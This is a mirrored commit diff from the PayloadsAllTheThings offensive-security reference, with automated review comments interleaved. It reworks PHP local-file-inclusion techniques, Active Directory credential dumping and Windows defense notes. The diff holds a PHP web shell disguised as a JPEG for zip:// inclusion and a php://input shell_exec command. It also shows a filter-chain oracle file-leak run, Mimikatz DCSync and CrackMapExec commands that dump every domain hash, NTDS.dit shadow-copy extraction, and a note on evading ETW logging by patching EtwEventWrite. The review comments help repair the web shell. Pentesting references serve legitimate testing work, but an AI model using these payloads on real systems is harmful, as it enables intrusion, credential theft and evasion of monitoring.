mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-11-10 07:04:22 +00:00
LFI iconv and dechunk + ETW + NTDS Dump Rework
This commit is contained in:
parent
dd0c23f9a2
commit
fddd094ee1
3 changed files with 92 additions and 113 deletions
|
@ -21,11 +21,12 @@
|
||||||
- [Bypass allow_url_include](#bypass-allow_url_include)
|
- [Bypass allow_url_include](#bypass-allow_url_include)
|
||||||
- [LFI / RFI using wrappers](#lfi--rfi-using-wrappers)
|
- [LFI / RFI using wrappers](#lfi--rfi-using-wrappers)
|
||||||
- [Wrapper php://filter](#wrapper-phpfilter)
|
- [Wrapper php://filter](#wrapper-phpfilter)
|
||||||
- [Wrapper zip://](#wrapper-zip)
|
|
||||||
- [Wrapper data://](#wrapper-data)
|
- [Wrapper data://](#wrapper-data)
|
||||||
- [Wrapper expect://](#wrapper-expect)
|
- [Wrapper expect://](#wrapper-expect)
|
||||||
- [Wrapper input://](#wrapper-input)
|
- [Wrapper input://](#wrapper-input)
|
||||||
|
- [Wrapper zip://](#wrapper-zip)
|
||||||
- [Wrapper phar://](#wrapper-phar)
|
- [Wrapper phar://](#wrapper-phar)
|
||||||
|
- [Wrapper iconv:// and dechunk://](#wrapper-iconv-and-dechunk)
|
||||||
- [LFI to RCE via /proc/*/fd](#lfi-to-rce-via-procfd)
|
- [LFI to RCE via /proc/*/fd](#lfi-to-rce-via-procfd)
|
||||||
- [LFI to RCE via /proc/self/environ](#lfi-to-rce-via-procselfenviron)
|
- [LFI to RCE via /proc/self/environ](#lfi-to-rce-via-procselfenviron)
|
||||||
- [LFI to RCE via upload](#lfi-to-rce-via-upload)
|
- [LFI to RCE via upload](#lfi-to-rce-via-upload)
|
||||||
|
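Review bot: the new TOC entry `#wrapper-iconv-and-dechunk` matches how GitHub slugs the heading `### Wrapper iconv:// and dechunk://` (punctuation dropped, spaces turned into hyphens), and moving `- [Wrapper zip://](#wrapper-zip)` below the `input://` entry keeps the list in the same order as the sections themselves, so nothing to change in this hunk.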
@ -173,18 +174,6 @@ Also there is a way to turn the `php://filter` into a full RCE.
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
### Wrapper zip://
|
|
||||||
|
|
||||||
1. Create an evil payload: `echo "<pre><?php system($_GET['cmd']); ?></pre>" > payload.php;`
|
|
||||||
2. Zip the file
|
|
||||||
```python
|
|
||||||
zip payload.zip payload.php;
|
|
||||||
mv payload.zip shell.jpg;
|
|
||||||
rm payload.php
|
|
||||||
```
|
|
||||||
3. Upload the archive and access the file using the wrappers: http://example.com/index.php?page=zip://shell.jpg%23payload.php
|
|
||||||
|
|
||||||
|
|
||||||
### Wrapper data://
|
### Wrapper data://
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
|
@ -217,6 +206,17 @@ Alternatively, Kadimus has a module to automate this attack.
|
||||||
./kadimus -u "https://example.com/index.php?page=php://input%00" -C '<?php echo shell_exec("id"); ?>' -T input
|
./kadimus -u "https://example.com/index.php?page=php://input%00" -C '<?php echo shell_exec("id"); ?>' -T input
|
||||||
```
|
```
|
||||||
|
|
||||||
|
### Wrapper zip://
|
||||||
|
|
||||||
|
1. Create an evil payload: `echo "<pre><?php system($_GET['cmd']); ?></pre>" > payload.php;`
|
||||||
|
2. Zip the file
|
||||||
|
```python
|
||||||
|
zip payload.zip payload.php;
|
||||||
|
mv payload.zip shell.jpg;
|
||||||
|
rm payload.php
|
||||||
|
```
|
||||||
|
3. Upload the archive and access the file using the wrappers: http://example.com/index.php?page=zip://shell.jpg%23payload.php
|
||||||
|
|
||||||
|
|
||||||
### Wrapper phar://
|
### Wrapper phar://
|
||||||
|
|
||||||
|
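Review bot: the payload line `echo "<pre><?php system($_GET['cmd']); ?></pre>" > payload.php;` is broken by shell expansion because it is double-quoted: `$_GET` is parsed as the (unset) shell variable `_GET` and expands to nothing, so the written file contains `system(['cmd'])`, which is a PHP syntax error. Use single quotes, e.g. `echo '<pre><?php system($_GET["cmd"]); ?></pre>' > payload.php`. Two style points on the same re-added block: the fence around `zip payload.zip payload.php;` / `mv payload.zip shell.jpg;` / `rm payload.php` is tagged ```python although these are shell commands (the neighbouring wrapper sections use ```powershell), and the trailing semicolons on each line serve no purpose.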
@ -252,6 +252,32 @@ include('phar://test.phar');
|
||||||
NOTE: The unserialize is triggered for the phar:// wrapper in any file operation, `file_exists` and many more.
|
NOTE: The unserialize is triggered for the phar:// wrapper in any file operation, `file_exists` and many more.
|
||||||
|
|
||||||
|
|
||||||
|
### Wrapper iconv:// and dechunk://
|
||||||
|
|
||||||
|
The goal is to leak the content of a file, one character at a time.
|
||||||
|
|
||||||
|
**Requirements**:
|
||||||
|
- Backend must not use `file_exists` or `is_file`.
|
||||||
|
- Vulnerable parameter should be in a `POST` request.
|
||||||
|
- You can't leak more than 135 characters in a GET request due to the size limit
|
||||||
|
|
||||||
|
The exploit chain is based on PHP filters: `iconv` and `dechunk`:
|
||||||
|
|
||||||
|
1. Use the `iconv` filter with an encoding increasing the data size exponentially to trigger a memory error.
|
||||||
|
2. Use the `dechunk` filter to determine the first character of the file, based on the previous error.
|
||||||
|
3. Use the `iconv` filter again with encodings having different bytes ordering to swap remaining characters with the first one.
|
||||||
|
|
||||||
|
Exploit using [synacktiv/php_filter_chains_oracle_exploit](https://github.com/synacktiv/php_filter_chains_oracle_exploit), the script will use either the `HTTP status code: 500` or the time as an error-based oracle to determine the character.
|
||||||
|
|
||||||
|
```ps1
|
||||||
|
$ python3 filters_chain_oracle_exploit.py --target http://127.0.0.1 --file '/test' --parameter 0
|
||||||
|
[*] The following URL is targeted : http://127.0.0.1
|
||||||
|
[*] The following local file is leaked : /test
|
||||||
|
[*] Running POST requests
|
||||||
|
[+] File /test leak is finished!
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
## LFI to RCE via /proc/*/fd
|
## LFI to RCE via /proc/*/fd
|
||||||
|
|
||||||
1. Upload a lot of shells (for example : 100)
|
1. Upload a lot of shells (for example : 100)
|
||||||
|
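Review bot: the `**Requirements**` list contradicts itself: `Vulnerable parameter should be in a POST request.` is presented as a requirement, and the next bullet then says GET works but is capped at 135 characters. State it as one constraint, i.e. the filter chain is long, so a GET parameter only leaks short files (roughly 135 characters) and a body-carried parameter is needed beyond that. The `Backend must not use file_exists or is_file.` bullet should also give the reason, namely that those calls return false for a `php://filter/...` path so the include is never reached; that is what a reader needs to recognise the constraint in code. Step 3, `swap remaining characters with the first one`, reads as if characters are exchanged with the first one; the byte-order swaps move the next unknown byte to the front so that the `dechunk` oracle from step 2 can test it. Finally, the block is tagged ```ps1 but shows a `$ python3 ...` invocation on a Linux shell prompt, so ```bash is the right tag (`ps1` is the PowerShell extension).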
@ -483,4 +509,5 @@ If SSH is active check which user is being used `/proc/self/status` and `/etc/pa
|
||||||
* [PHP LFI to arbitrary code execution via rfc1867 file upload temporary files (EN) - gynvael.coldwind - 2011-03-18](https://gynvael.coldwind.pl/?id=376)
|
* [PHP LFI to arbitrary code execution via rfc1867 file upload temporary files (EN) - gynvael.coldwind - 2011-03-18](https://gynvael.coldwind.pl/?id=376)
|
||||||
* [LFI2RCE via PHP Filters - HackTricks](https://book.hacktricks.xyz/pentesting-web/file-inclusion/lfi2rce-via-php-filters)
|
* [LFI2RCE via PHP Filters - HackTricks](https://book.hacktricks.xyz/pentesting-web/file-inclusion/lfi2rce-via-php-filters)
|
||||||
* [Solving "includer's revenge" from hxp ctf 2021 without controlling any files - @loknop](https://gist.github.com/loknop/b27422d355ea1fd0d90d6dbc1e278d4d)
|
* [Solving "includer's revenge" from hxp ctf 2021 without controlling any files - @loknop](https://gist.github.com/loknop/b27422d355ea1fd0d90d6dbc1e278d4d)
|
||||||
* [PHP FILTERS CHAIN: WHAT IS IT AND HOW TO USE IT - Rémi Matasse - 18/10/2022](https://www.synacktiv.com/publications/php-filters-chain-what-is-it-and-how-to-use-it.html)
|
* [PHP FILTERS CHAIN: WHAT IS IT AND HOW TO USE IT - Rémi Matasse - 18/10/2022](https://www.synacktiv.com/publications/php-filters-chain-what-is-it-and-how-to-use-it.html)
|
||||||
|
* [PHP FILTER CHAINS: FILE READ FROM ERROR-BASED ORACLE - Rémi Matasse - 21/03/2023](https://www.synacktiv.com/en/publications/php-filter-chains-file-read-from-error-based-oracle.html)
|
||||||
|
|
|
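Review bot: the new reference uses `21/03/2023` for the date while the entries above mix ISO `2011-03-18` and `18/10/2022`; the two Synacktiv entries now sit next to each other with different URL forms too (`/publications/` versus `/en/publications/`). Pick one date format for the list (ISO is unambiguous) and use the same URL form for both Synacktiv links.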
@ -30,14 +30,9 @@
|
||||||
- [Abuse GPO with PowerView](#abuse-gpo-with-powerview)
|
- [Abuse GPO with PowerView](#abuse-gpo-with-powerview)
|
||||||
- [Abuse GPO with StandIn](#abuse-gpo-with-standin)
|
- [Abuse GPO with StandIn](#abuse-gpo-with-standin)
|
||||||
- [Dumping AD Domain Credentials](#dumping-ad-domain-credentials)
|
- [Dumping AD Domain Credentials](#dumping-ad-domain-credentials)
|
||||||
- [Using ndtsutil](#using-ndtsutil)
|
- [DCSync Attack](#dcsync-attack)
|
||||||
- [Using Vshadow](#using-vshadow)
|
- [Volume Shadow Copy](#volume-shadow-copy)
|
||||||
- [Using vssadmin](#using-vssadmin)
|
|
||||||
- [Using DiskShadow (a Windows signed binary)](#using-diskshadow-a-windows-signed-binary)
|
|
||||||
- [Using esentutl.exe](#using-esentutlexe)
|
|
||||||
- [Extract hashes from ntds.dit](#extract-hashes-from-ntdsdit)
|
- [Extract hashes from ntds.dit](#extract-hashes-from-ntdsdit)
|
||||||
- [Alternatives - modules](#alternatives---modules)
|
|
||||||
- [Using Mimikatz DCSync](#using-mimikatz-dcsync)
|
|
||||||
- [Using Mimikatz sekurlsa](#using-mimikatz-sekurlsa)
|
- [Using Mimikatz sekurlsa](#using-mimikatz-sekurlsa)
|
||||||
- [Crack NTLM hashes with hashcat](#crack-ntlm-hashes-with-hashcat)
|
- [Crack NTLM hashes with hashcat](#crack-ntlm-hashes-with-hashcat)
|
||||||
- [NTDS Reversible Encryption](#ntds-reversible-encryption)
|
- [NTDS Reversible Encryption](#ntds-reversible-encryption)
|
||||||
|
@ -1259,72 +1254,44 @@ However you can change the location to a custom one, you will need to query the
|
||||||
reg query HKLM\SYSTEM\CurrentControlSet\Services\NTDS\Parameters /v "DSA Database file"
|
reg query HKLM\SYSTEM\CurrentControlSet\Services\NTDS\Parameters /v "DSA Database file"
|
||||||
```
|
```
|
||||||
|
|
||||||
### Using ndtsutil
|
### DCSync Attack
|
||||||
|
|
||||||
```powershell
|
DCSync is a technique used by attackers to obtain sensitive information, including password hashes, from a domain controller in an Active Directory environment. Any member of Administrators, Domain Admins, or Enterprise Admins as well as Domain Controller computer accounts are able to run DCSync to pull password data.
|
||||||
C:\>ntdsutil
|
|
||||||
ntdsutil: activate instance ntds
|
|
||||||
ntdsutil: ifm
|
|
||||||
ifm: create full c:\pentest
|
|
||||||
ifm: quit
|
|
||||||
ntdsutil: quit
|
|
||||||
```
|
|
||||||
|
|
||||||
or
|
* DCSync only one user
|
||||||
|
```powershell
|
||||||
|
mimikatz# lsadump::dcsync /domain:htb.local /user:krbtgt
|
||||||
|
```
|
||||||
|
* DCSync all users of the domain
|
||||||
|
```powershell
|
||||||
|
mimikatz# lsadump::dcsync /domain:htb.local /all /csv
|
||||||
|
|
||||||
```powershell
|
crackmapexec smb 10.10.10.10 -u 'username' -p 'password' --ntds
|
||||||
ntdsutil "ac i ntds" "ifm" "create full c:\temp" q q
|
crackmapexec smb 10.10.10.10 -u 'username' -p 'password' --ntds drsuapi
|
||||||
```
|
```
|
||||||
|
|
||||||
### Using Vshadow
|
> :warning: OPSEC NOTE: Replication is always done between 2 Computers. Doing a DCSync from a user account can raise alerts.
|
||||||
|
|
||||||
```powershell
|
|
||||||
vssadmin create shadow /for=C :
|
|
||||||
Copy Shadow_Copy_Volume_Name\windows\ntds\ntds.dit c:\ntds.dit
|
|
||||||
```
|
|
||||||
|
|
||||||
You can also use the Nishang script, available at : [https://github.com/samratashok/nishang](https://github.com/samratashok/nishang)
|
### Volume Shadow Copy
|
||||||
|
|
||||||
```powershell
|
The VSS is a Windows service that allows users to create snapshots or backups of their data at a specific point in time. Attackers can abuse this service to access and copy sensitive data, even if it is currently being used or locked by another process.
|
||||||
Import-Module .\Copy-VSS.ps1
|
|
||||||
Copy-VSS
|
|
||||||
Copy-VSS -DestinationDir C:\ShadowCopy\
|
|
||||||
```
|
|
||||||
|
|
||||||
### Using vssadmin
|
* [windows-commands/vssadmin](https://learn.microsoft.com/fr-fr/windows-server/administration/windows-commands/vssadmin)
|
||||||
|
```powershell
|
||||||
|
vssadmin create shadow /for=C:
|
||||||
|
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\ShadowCopy
|
||||||
|
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\ShadowCopy
|
||||||
|
```
|
||||||
|
* [windows-commands/ntdsutil](https://learn.microsoft.com/fr-fr/troubleshoot/windows-server/identity/use-ntdsutil-manage-ad-files)
|
||||||
|
```powershell
|
||||||
|
ntdsutil "ac i ntds" "ifm" "create full c:\temp" q q
|
||||||
|
```
|
||||||
|
* [CrackMapExec VSS module](https://wiki.porchetta.industries/smb-protocol/obtaining-credentials/dump-ntds.dit)
|
||||||
|
```powershell
|
||||||
|
cme smb 10.10.0.202 -u username -p password --ntds vss
|
||||||
|
```
|
||||||
|
|
||||||
```powershell
|
|
||||||
vssadmin create shadow /for=C:
|
|
||||||
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\ShadowCopy
|
|
||||||
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\ShadowCopy
|
|
||||||
```
|
|
||||||
|
|
||||||
### Using DiskShadow (a Windows signed binary)
|
|
||||||
|
|
||||||
```powershell
|
|
||||||
diskshadow.txt contains :
|
|
||||||
set context persistent nowriters
|
|
||||||
add volume c: alias someAlias
|
|
||||||
create
|
|
||||||
expose %someAlias% z:
|
|
||||||
exec "cmd.exe" /c copy z:\windows\ntds\ntds.dit c:\exfil\ntds.dit
|
|
||||||
delete shadows volume %someAlias%
|
|
||||||
reset
|
|
||||||
|
|
||||||
then:
|
|
||||||
NOTE - must be executed from C:\Windows\System32
|
|
||||||
diskshadow.exe /s c:\diskshadow.txt
|
|
||||||
dir c:\exfil
|
|
||||||
reg.exe save hklm\system c:\exfil\system.bak
|
|
||||||
```
|
|
||||||
|
|
||||||
### Using esentutl.exe
|
|
||||||
|
|
||||||
Copy/extract a locked file such as the AD Database
|
|
||||||
|
|
||||||
```powershell
|
|
||||||
esentutl.exe /y /vss c:\windows\ntds\ntds.dit /d c:\folder\ntds.dit
|
|
||||||
```
|
|
||||||
|
|
||||||
### Extract hashes from ntds.dit
|
### Extract hashes from ntds.dit
|
||||||
|
|
||||||
|
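Review bot: the rework drops three techniques that were not folded into the new `### Volume Shadow Copy` section: the DiskShadow script (`set context persistent nowriters` ... `expose %someAlias% z:` ... `diskshadow.exe /s c:\diskshadow.txt`), `esentutl.exe /y /vss c:\windows\ntds\ntds.dit /d c:\folder\ntds.dit`, and the Nishang `Copy-VSS` script. They are distinct tooling from `vssadmin` (signed binaries that may be usable where `vssadmin` is monitored or blocked), so keep them as sub-bullets of the new section rather than deleting them. On the added lines: `copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\ShadowCopy` hard-codes shadow copy `1`; the removed text used the placeholder `Shadow_Copy_Volume_Name`, which was more accurate since the index increments with every existing snapshot and the output of `vssadmin create shadow /for=C:` prints the actual device path to use. The `C:\ShadowCopy` destination must also exist before the `copy`. The two learn.microsoft.com links use the `fr-fr` locale; use `en-us` like the rest of the document. The OPSEC note `Replication is always done between 2 Computers.` should say the concrete thing: legitimate replication originates from domain controller computer accounts, so a replication request coming from a user account or a non-DC host is the anomaly an alert keys on.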
@ -1344,40 +1311,6 @@ secretsdump.py -system /root/SYSTEM -ntds /root/ntds.dit LOCAL
|
||||||
* `-pwd-last-set`: Shows pwdLastSet attribute for each NTDS.DIT account.
|
* `-pwd-last-set`: Shows pwdLastSet attribute for each NTDS.DIT account.
|
||||||
* `-user-status`: Display whether or not the user is disabled.
|
* `-user-status`: Display whether or not the user is disabled.
|
||||||
|
|
||||||
### Alternatives - modules
|
|
||||||
|
|
||||||
Metasploit modules
|
|
||||||
|
|
||||||
```c
|
|
||||||
windows/gather/credentials/domain_hashdump
|
|
||||||
```
|
|
||||||
|
|
||||||
PowerSploit module
|
|
||||||
|
|
||||||
```powershell
|
|
||||||
Invoke-NinjaCopy --path c:\windows\NTDS\ntds.dit --verbose --localdestination c:\ntds.dit
|
|
||||||
```
|
|
||||||
|
|
||||||
CrackMapExec module
|
|
||||||
|
|
||||||
```powershell
|
|
||||||
cme smb 10.10.0.202 -u username -p password --ntds vss
|
|
||||||
cme smb 10.10.0.202 -u username -p password --ntds drsuapi #default
|
|
||||||
```
|
|
||||||
|
|
||||||
### Using Mimikatz DCSync
|
|
||||||
|
|
||||||
Any member of Administrators, Domain Admins, or Enterprise Admins as well as Domain Controller computer accounts are able to run DCSync to pull password data.
|
|
||||||
|
|
||||||
```powershell
|
|
||||||
# DCSync only one user
|
|
||||||
mimikatz# lsadump::dcsync /domain:htb.local /user:krbtgt
|
|
||||||
|
|
||||||
# DCSync all users of the domain
|
|
||||||
mimikatz# lsadump::dcsync /domain:htb.local /all /csv
|
|
||||||
```
|
|
||||||
|
|
||||||
:warning: Read-Only Domain Controllers are not allowed to pull password data for users by default.
|
|
||||||
|
|
||||||
### Using Mimikatz sekurlsa
|
### Using Mimikatz sekurlsa
|
||||||
|
|
||||||
|
|
|
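Review bot: the removed `### Using Mimikatz DCSync` section carried the caveat `:warning: Read-Only Domain Controllers are not allowed to pull password data for users by default.`, and the new `### DCSync Attack` section in the previous hunk does not carry it over; re-add it there, since it explains why DCSync fails when the target or the replicating account is an RODC. The PowerSploit `Invoke-NinjaCopy --path c:\windows\NTDS\ntds.dit --verbose --localdestination c:\ntds.dit` and Metasploit `windows/gather/credentials/domain_hashdump` entries are also removed without replacement; if the intent is to narrow the page to the two main approaches, say so in the commit message, otherwise move them under the new sections.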
@ -11,6 +11,7 @@
|
||||||
* [Script Block Logging](#script-block-logging)
|
* [Script Block Logging](#script-block-logging)
|
||||||
* [Protected Process Light](#protected-process-light)
|
* [Protected Process Light](#protected-process-light)
|
||||||
* [Credential Guard](#credential-guard)
|
* [Credential Guard](#credential-guard)
|
||||||
|
* [Event Tracing for Windows](#event-tracing-for-windows)
|
||||||
* [Windows Defender Antivirus](#windows-defender-antivirus)
|
* [Windows Defender Antivirus](#windows-defender-antivirus)
|
||||||
* [Windows Defender Application Control](#windows-defender-application-control)
|
* [Windows Defender Application Control](#windows-defender-application-control)
|
||||||
* [Windows Defender Firewall](#windows-defender-firewall)
|
* [Windows Defender Firewall](#windows-defender-firewall)
|
||||||
|
@ -180,6 +181,22 @@ When Credential Guard is enabled, it uses hardware-based virtualization to creat
|
||||||
Credential Guard uses a combination of hardware-based virtualization and the Trusted Platform Module (TPM) to ensure that the secure kernel is trusted and secure. It can be enabled on devices that have a compatible processor and TPM version, and require a UEFI firmware that supports the necessary features.
|
Credential Guard uses a combination of hardware-based virtualization and the Trusted Platform Module (TPM) to ensure that the secure kernel is trusted and secure. It can be enabled on devices that have a compatible processor and TPM version, and require a UEFI firmware that supports the necessary features.
|
||||||
|
|
||||||
|
|
||||||
|
## Event Tracing for Windows
|
||||||
|
|
||||||
|
ETW (Event Tracing for Windows) is a Windows-based logging mechanism that provides a way to collect and analyze system events and performance data in real-time. ETW allows developers and system administrators to gather detailed information about system performance and behavior, which can be used for troubleshooting, optimization, and security purposes.
|
||||||
|
|
||||||
|
| Name | GUID |
|
||||||
|
|---------------------------------------|----------------------------------------|
|
||||||
|
| Microsoft-Antimalware-Scan-Interface | {2A576B87-09A7-520E-C21A-4942F0271D67} |
|
||||||
|
| Microsoft-Windows-PowerShell | {A0C1853B-5C40-4B15-8766-3CF1C58F985A} |
|
||||||
|
| Microsoft-Antimalware-Protection | {E4B70372-261F-4C54-8FA6-A5A7914D73DA} |
|
||||||
|
| Microsoft-Windows-Threat-Intelligence | {F4E1897C-BB5D-5668-F1D8-040F4D8DD344} |
|
||||||
|
|
||||||
|
The `Microsoft-Windows-Threat-Intelligence` provider corresponds to ETWTI, an additional security feature that an EDR can subscribe to and identify malicious uses of APIs (e.g. process injection).
|
||||||
|
|
||||||
|
The most common bypassing technique is patching the function `EtwEventWrite` which is called to write/log ETW events.
|
||||||
|
|
||||||
|
|
||||||
## Windows Defender Antivirus
|
## Windows Defender Antivirus
|
||||||
|
|
||||||
Also known as `Microsoft Defender`.
|
Also known as `Microsoft Defender`.
|
||||||
|
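Review bot: `The most common bypassing technique is patching the function EtwEventWrite` needs its scope stated. `EtwEventWrite` is the user-mode ntdll export a process calls to emit its own events, so patching it in the current process only silences user-mode providers such as `Microsoft-Windows-PowerShell` and `Microsoft-Antimalware-Scan-Interface` for that process; it does not affect `Microsoft-Windows-Threat-Intelligence`, whose events are generated by the kernel on behalf of the monitored process. As written, the sentence follows the ETWTI paragraph directly and reads as if the same patch covers it. Also, the provider GUID table has no source; name where the values come from (for example `logman query providers` output) so a reader can verify them.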
@ -283,4 +300,6 @@ The **Enterprise Context** column shows you what each app can do with your enter
|
||||||
* [PowerShell about_Logging_Windows - Microsoft Documentation](https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_logging_windows?view=powershell-7.3)
|
* [PowerShell about_Logging_Windows - Microsoft Documentation](https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_logging_windows?view=powershell-7.3)
|
||||||
* [Do You Really Know About LSA Protection (RunAsPPL)? - itm4n - Apr 7, 2021](https://itm4n.github.io/lsass-runasppl/)
|
* [Do You Really Know About LSA Protection (RunAsPPL)? - itm4n - Apr 7, 2021](https://itm4n.github.io/lsass-runasppl/)
|
||||||
* [Determine the Enterprise Context of an app running in Windows Information Protection (WIP) - 03/10/2023 - Microsoft](https://learn.microsoft.com/en-us/windows/security/information-protection/windows-information-protection/wip-app-enterprise-context)
|
* [Determine the Enterprise Context of an app running in Windows Information Protection (WIP) - 03/10/2023 - Microsoft](https://learn.microsoft.com/en-us/windows/security/information-protection/windows-information-protection/wip-app-enterprise-context)
|
||||||
* [Create and verify an Encrypting File System (EFS) Data Recovery Agent (DRA) certificate - 12/09/2022 - Microsoft](https://learn.microsoft.com/en-us/windows/security/information-protection/windows-information-protection/create-and-verify-an-efs-dra-certificate)
|
* [Create and verify an Encrypting File System (EFS) Data Recovery Agent (DRA) certificate - 12/09/2022 - Microsoft](https://learn.microsoft.com/en-us/windows/security/information-protection/windows-information-protection/create-and-verify-an-efs-dra-certificate)
|
||||||
|
* [DISABLING AV WITH PROCESS SUSPENSION - March 24, 2023 - By Christopher Paschen ](https://www.trustedsec.com/blog/disabling-av-with-process-suspension/)
|
||||||
|
* [Disabling Event Tracing For Windows - UNPROTECT PROJECT - Tuesday 19 April 2022](https://unprotect.it/technique/disabling-event-tracing-for-windows-etw/)
|
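Review bot: the link text `DISABLING AV WITH PROCESS SUSPENSION - March 24, 2023 - By Christopher Paschen ]` has a trailing space before the closing bracket; remove it. That entry concerns Windows Defender rather than ETW, so it belongs next to the Defender-related references in the list, while the Unprotect `Disabling Event Tracing For Windows` entry is the one that supports the new section.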